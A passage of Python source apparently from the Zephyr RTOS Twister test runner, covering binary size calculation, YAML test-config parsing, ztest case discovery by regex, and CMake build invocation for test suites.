return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
argument. Return testcase names and eventually found warnings.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find src directory with test source code. Sometimes due to the
optimization reasons it is placed in upper directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param test The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
